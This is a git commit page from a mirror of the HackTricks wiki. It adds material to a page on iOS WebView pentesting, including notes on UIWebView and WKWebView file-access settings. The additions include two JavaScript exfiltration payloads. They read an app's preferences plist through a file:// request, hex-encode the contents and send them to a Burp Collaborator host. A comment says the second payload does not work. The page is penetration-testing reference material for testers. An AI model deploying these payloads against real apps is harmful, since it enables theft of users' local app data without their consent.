0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2021-05-30 11:58:38 +00:00 committed by gitbook-bot
parent d38dd12c95
commit 418360ab5c
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 41 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

42
mobile-apps-pentesting/ios-pentesting/ios-webviews.md
View file

@ -174,6 +174,34 @@ $ rabin2 -zz ./WheresMyBrowser | grep -i "loadHTMLString"
* File access from `file://` URLs is always enabled.
* Universal access from `file://` URLs is always enabled.
* If you retrieve the effective origin from a `UIWebView` where `baseURL` is also set to `nil` you will see that it is **not set to "null"**, instead you'll obtain something similar to the following: `applewebdata://5361016c-f4a0-4305-816b-65411fc1d78`0. This origin "applewebdata://" is similar to the "file://" origin as it **does not implement Same-Origin Policy** and allow access to local files and any web resources.
{% tabs %}
{% tab title="exfiltrate\_file" %}
```javascript
String.prototype.hexEncode = function(){
var hex, i;
var result = "";
for (i=0; i<this.length; i++) {
hex = this.charCodeAt(i).toString(16);
result += ("000"+hex).slice(-4);
}
return result
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var xhr2 = new XMLHttpRequest();
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+xhr.responseText.hexEncode(), true);
xhr2.send(null);
}
}
xhr.open('GET', 'file:///var/mobile/Containers/Data/Application/ED4E0AD8-F7F7-4078-93CC-C350465048A5/Library/Preferences/com.authenticationfailure.WheresMyBrowser.plist', true);
xhr.send(null);
```
{% endtab %}
{% endtabs %}
* **WKWebView**:
* **`allowFileAccessFromFileURLs`** \(`WKPreferences`, `false` by default\): it enables JavaScript running in the context of a `file://` scheme URL to access content from other `file://` scheme URLs.
* **`allowUniversalAccessFromFileURLs`** \(`WKWebViewConfiguration`, `false` by default\): it enables JavaScript running in the context of a `file://` scheme URL to access content from any origin.
@ -214,11 +242,23 @@ allowUniversalAccessFromFileURLs: 0
#### Exfiltrate arbitrary files
```javascript
//For some reason this payload doesn't work!!
//Let me know if you know how to exfiltrate local files from a WKWebView
String.prototype.hexEncode = function(){
var hex, i;
var result = "";
for (i=0; i<this.length; i++) {
hex = this.charCodeAt(i).toString(16);
result += ("000"+hex).slice(-4);
}
return result
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var xhr2 = new XMLHttpRequest();
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+btoa(), true);
xhr2.open('GET', 'http://187e2gd0zxunzmb5vlowsz4j1a70vp.burpcollaborator.net/'+xhr.responseText.hexEncode(), true);
xhr2.send(null);
}
}